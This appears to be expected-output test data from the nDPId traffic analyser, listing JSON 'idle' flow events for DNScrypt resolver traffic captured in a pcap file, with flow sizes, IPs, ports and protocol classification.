+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396214,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337079,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312401,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396113,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348804,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381015,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317429,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318063,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318164,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 